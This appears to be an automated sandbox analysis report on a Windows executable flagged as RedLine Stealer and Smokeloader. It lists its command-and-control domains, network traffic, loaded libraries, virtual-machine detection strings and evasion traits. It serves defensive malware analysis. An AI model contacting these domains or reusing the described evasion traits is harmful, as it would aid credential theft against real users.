      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: spellshagey.biz
      Source: global trafficDNS traffic detected: DNS query: immureprech.biz
      Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
      Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
      Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
      Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
      Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
      Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
      Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe Code function: 0_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_004327B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe Code function: 0_2_004339F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 0_2_004339F0

      System Summary

      Source: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004096000_2_00409600
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004166030_2_00416603
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041DE200_2_0041DE20
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004386300_2_00438630
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004186380_2_00418638
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004066D00_2_004066D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004266D00_2_004266D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00415EDC0_2_00415EDC
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00402EE00_2_00402EE0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004256910_2_00425691
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004236990_2_00423699
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00405EA00_2_00405EA0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00438F450_2_00438F45
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043EF600_2_0043EF60
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040DF040_2_0040DF04
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00422F0D0_2_00422F0D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00414F1E0_2_00414F1E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00436F200_2_00436F20
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004377E00_2_004377E0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004277800_2_00427780
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041E7900_2_0041E790
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004277A00_2_004277A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00423FA00_2_00423FA0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004227B00_2_004227B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A7A470_2_024A7A47
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02492A170_2_02492A17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A52D40_2_024A52D4
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AEAA70_2_024AEAA7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02478B170_2_02478B17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247AB270_2_0247AB27
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A03C80_2_024A03C8
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AABD70_2_024AABD7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A73E70_2_024A73E7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247D3870_2_0247D387
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02473B870_2_02473B87
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024893950_2_02489395
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024793B70_2_024793B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02475BB70_2_02475BB7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248A3B70_2_0248A3B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AB0470_2_024AB047
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AF8470_2_024AF847
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248085A0_2_0248085A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024798670_2_02479867
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A681B0_2_024A681B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A28270_2_024A2827
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024788370_2_02478837
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248D08A0_2_0248D08A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E0870_2_0248E087
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A88970_2_024A8897
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247C8A30_2_0247C8A3
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024888A10_2_024888A1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248B8B70_2_0248B8B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247E16B0_2_0247E16B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024761070_2_02476107
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024769370_2_02476937
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024969370_2_02496937
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AF1C70_2_024AF1C7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E9F70_2_0248E9F7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024851850_2_02485185
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A71870_2_024A7187
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02489E660_2_02489E66
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024926070_2_02492607
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A7E270_2_024A7E27
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02474EC70_2_02474EC7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0249DDE10_2_0249DDE1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AEEE70_2_024AEEE7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02481EA70_2_02481EA7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247EF470_2_0247EF47
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024777070_2_02477707
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E7C70_2_0248E7C7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248D4670_2_0248D467
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248FC770_2_0248FC77
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248140D0_2_0248140D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AEC370_2_024AEC37
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AF4E70_2_024AF4E7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02491CE70_2_02491CE7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E4870_2_0248E487
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024764A70_2_024764A7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024865580_2_02486558
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02494D070_2_02494D07
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02479D280_2_02479D28
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024745370_2_02474537
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024975370_2_02497537
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248B5C70_2_0248B5C7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A25D70_2_024A25D7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0249DDE60_2_0249DDE6
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A5DFF0_2_024A5DFF
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248CD8D0_2_0248CD8D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02472DA70_2_02472DA7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: String function: 024843C7 appears 69 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: String function: 00414160 appears 69 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: String function: 00407EB0 appears 57 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: String function: 02478117 appears 74 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784
      Source: 3zg6i6Zu1u.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c (reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12)
      Source: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f (reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23)
      Source: 3zg6i6Zu1u.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@11/2
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_009A9C5E CreateToolhelp32Snapshot, Module32First (0_2_009A9C5E)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_00437BC0 CoCreateInstance, SysAllocString, CoSetProxyBlanket, SysAllocString, SysAllocString, VariantInit, VariantClear, SysFreeString, SysFreeString, SysFreeString, SysFreeString, GetVolumeInformationW (0_2_00437BC0)
      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1564
      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\671973ee-7ef1-4ae3-be34-2c6d2669120b
      Source: 3zg6i6Zu1u.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: 3zg6i6Zu1u.exe | Virustotal: Detection: 73%
      Source: 3zg6i6Zu1u.exe | ReversingLabs: Detection: 78%
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | File read: C:\Users\user\Desktop\3zg6i6Zu1u.exe
      Source: unknown | Process created: C:\Users\user\Desktop\3zg6i6Zu1u.exe "C:\Users\user\Desktop\3zg6i6Zu1u.exe"
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: msvcr100.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: webio.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: wbemcomn.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: amsi.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Unpacked PE file: 0.2.3zg6i6Zu1u.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Unpacked PE file: 0.2.3zg6i6Zu1u.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_0043D950 push eax; mov dword ptr [esp], 71708F5Eh (0_2_0043D951)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_0044728C push ds; ret (0_2_0044728D)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_0043AD30 push eax; mov dword ptr [esp], ADAEAFA0h (0_2_0043AD3E)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_00446EDF push eax; retf (0_2_00446EE0)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_0247EA8C push edx; ret (0_2_0247EA8D)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_024ADBB7 push eax; mov dword ptr [esp], 71708F5Eh (0_2_024ADBB8)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_024AAF97 push eax; mov dword ptr [esp], ADAEAFA0h (0_2_024AAFA5)
      Source: 3zg6i6Zu1u.exe | Static PE information: section name: .text entropy: 7.366149067404338
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe TID: 5652 | Thread sleep time: -90000s >= -30000s
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe TID: 2060 | Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: Amcache.hve.4.dr | Binary or memory string: VMware
      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
      Source: Amcache.hve.4.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
      Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000002.1665418921.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
      Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
      Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWisu patidizirur hutemit zajorafo+Wexikoci gosabi muwidovicun pipica hekaruhoGVabuluzorejek sarifud bamayusefuruki muyawo sefalilumixulib xopi nolacuxLovicivona renuzo daferidilogejat mofe faxavugikecug wofofususefibob dahutele popizajixucom fot
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_0043C330 LdrInitializeThunk (0_2_0043C330)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_009A953B push dword ptr fs:[00000030h] (0_2_009A953B)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_0247092B mov eax, dword ptr fs:[00000030h] (0_2_0247092B)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h] (0_2_02470D90)

      HIPS / PFW / Operating System Protection Evasion

      Source: 3zg6i6Zu1u.exe | String found in binary or memory: debonairnukk.xyz
      Source: 3zg6i6Zu1u.exe | String found in binary or memory: diffuculttan.xyz
      Source: 3zg6i6Zu1u.exe | String found in binary or memory: effecterectz.xyz
      Source: 3zg6i6Zu1u.exe | String found in binary or memory: deafeninggeh.biz
      Source: 3zg6i6Zu1u.exe | String found in binary or memory: immureprech.biz
      Source: 3zg6i6Zu1u.exe | String found in binary or memory: spellshagey.biz
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
